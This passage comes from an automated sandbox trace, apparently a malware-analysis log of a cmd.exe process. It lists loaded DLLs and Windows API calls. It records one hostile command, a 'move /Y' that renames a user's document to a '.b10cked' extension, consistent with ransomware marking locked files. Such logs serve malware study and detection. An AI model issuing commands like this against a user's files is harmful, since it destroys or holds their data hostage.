"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35339 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35340 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file 
name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35341 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35342 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35343 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35344 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 35345 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35346 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35347 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35348 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35349 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35350 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35351 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 35352 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 35353 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 869 os_tid = 0xf24 [0234.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afad4 | out: lpSystemTimeAsFileTime=0x2afad4*(dwLowDateTime=0xbf7a1a00, dwHighDateTime=0x1d440a9)) [0234.901] GetCurrentProcessId () returned 0xdf0 [0234.901] GetCurrentThreadId () returned 0xf24 [0234.901] GetTickCount () returned 0x4081a [0234.901] QueryPerformanceCounter (in: lpPerformanceCount=0x2afacc | out: lpPerformanceCount=0x2afacc*=29169010902) returned 1 [0234.901] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.901] __set_app_type (_Type=0x1) [0234.902] __p__fmode () returned 0x76b331f4 [0234.902] __p__commode () returned 0x76b331fc [0234.902] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.902] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.902] GetCurrentThreadId () returned 0xf24 [0234.902] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf24) returned 0x38 [0234.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.902] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.902] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.902] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.902] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x2afa64 | out: phkResult=0x2afa64*=0x0) returned 0x2 [0234.902] VirtualQuery (in: lpAddress=0x2afa9b, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.902] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa34, dwLength=0x1c | out: lpBuffer=0x2afa34*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.903] GetConsoleOutputCP () returned 0x1b5 [0234.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.903] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.903] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.903] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.903] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 
[0234.903] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.903] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.903] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.903] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.904] GetEnvironmentStringsW () returned 0x90190* [0234.904] FreeEnvironmentStringsW (penv=0x90190) returned 1 [0234.904] GetEnvironmentStringsW () returned 0x90190* [0234.904] FreeEnvironmentStringsW (penv=0x90190) returned 1 [0234.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9d4 | out: phkResult=0x2ae9d4*=0x40) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0xb8, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x0, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", 
lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegCloseKey (hKey=0x40) returned 0x0 [0234.904] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae9d4 | out: phkResult=0x2ae9d4*=0x40) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x40, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.904] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x1, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x0, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x9, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, 
lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x4, lpData=0x2ae9e0*=0x9, lpcbData=0x2ae9d8*=0x4) returned 0x0 [0234.905] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae9dc, lpData=0x2ae9e0, lpcbData=0x2ae9d8*=0x1000 | out: lpType=0x2ae9dc*=0x0, lpData=0x2ae9e0*=0x9, lpcbData=0x2ae9d8*=0x1000) returned 0x2 [0234.905] RegCloseKey (hKey=0x40) returned 0x0 [0234.905] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.905] srand (_Seed=0x5b8863c2) [0234.905] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"" [0234.905] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"" [0234.905] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.905] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x918f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.905] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.905] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.905] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.905] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.905] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.906] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 
13 [0234.906] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.906] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.906] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.906] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.906] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.906] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.906] GetEnvironmentStringsW () returned 0x922e0* [0234.906] FreeEnvironmentStringsW (penv=0x922e0) returned 1 [0234.906] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.906] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.906] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.906] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.906] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.906] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.906] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.906] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.906] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.906] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af7a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.906] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af7a0, lpFilePart=0x2af79c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af79c*="Desktop") returned 0x18 [0234.906] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.906] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af51c | out: 
lpFindFileData=0x2af51c) returned 0x90020 [0234.907] FindClose (in: hFindFile=0x90020 | out: hFindFile=0x90020) returned 1 [0234.907] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af51c | out: lpFindFileData=0x2af51c) returned 0x90020 [0234.907] FindClose (in: hFindFile=0x90020 | out: hFindFile=0x90020) returned 1 [0234.907] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af51c | out: lpFindFileData=0x2af51c) returned 0x90020 [0234.907] FindClose (in: hFindFile=0x90020 | out: hFindFile=0x90020) returned 1 [0234.907] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.907] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.907] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.907] GetEnvironmentStringsW () returned 0x92b00* [0234.907] FreeEnvironmentStringsW (penv=0x92b00) returned 1 [0234.907] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.908] GetConsoleOutputCP () returned 0x1b5 [0234.908] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.908] GetUserDefaultLCID () returned 0x409 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af8e0, cchData=128 | out: lpLCData="0") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af8e0, cchData=128 | out: lpLCData="0") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af8e0, cchData=128 | out: lpLCData="1") returned 2 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.908] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.909] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.909] GetConsoleTitleW (in: lpConsoleTitle=0x808e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.910] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.910] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.910] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.910] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.910] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.910] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.910] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.910] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.910] _wcsicmp (_String1="IF/?", 
_String2="move") returned -4 [0234.910] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.910] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.913] GetConsoleTitleW (in: lpConsoleTitle=0x2af5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.914] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.914] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.914] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.914] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.914] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.914] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.914] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.914] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.914] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.914] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.914] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.915] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.915] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.915] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.915] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.915] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.915] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.915] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.915] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.915] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.915] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.915] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.915] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.915] _wcsicmp 
(_String1="move", _String2="VER") returned -9 [0234.915] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.915] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.915] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.915] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.915] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.915] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.915] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.917] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.917] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.917] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af394, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af38c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af38c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 
[0234.917] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.918] _wcsnicmp 
(_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.918] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.918] _wcsicmp (_String1="AK_FOD~1.OTS", _String2=".") returned 51 [0234.918] _wcsicmp (_String1="AK_FOD~1.OTS", _String2="..") returned 51 [0234.918] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod~1.ots")) returned 0x20 [0234.919] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x91e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.919] SetErrorMode (uMode=0x0) returned 0x0 [0234.919] SetErrorMode (uMode=0x1) returned 0x0 [0234.919] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", nBufferLength=0x104, lpBuffer=0x2aed1c, lpFilePart=0x2aed04 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", lpFilePart=0x2aed04*="AK_FOD~1.OTS") returned 0x2d [0234.919] SetErrorMode (uMode=0x0) returned 0x1 [0234.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x12 [0234.919] _wcsicmp (_String1="AK_FOD~1.OTS", _String2=".") returned 51 [0234.919] _wcsicmp (_String1="AK_FOD~1.OTS", _String2="..") returned 51 [0234.919] GetFileAttributesW 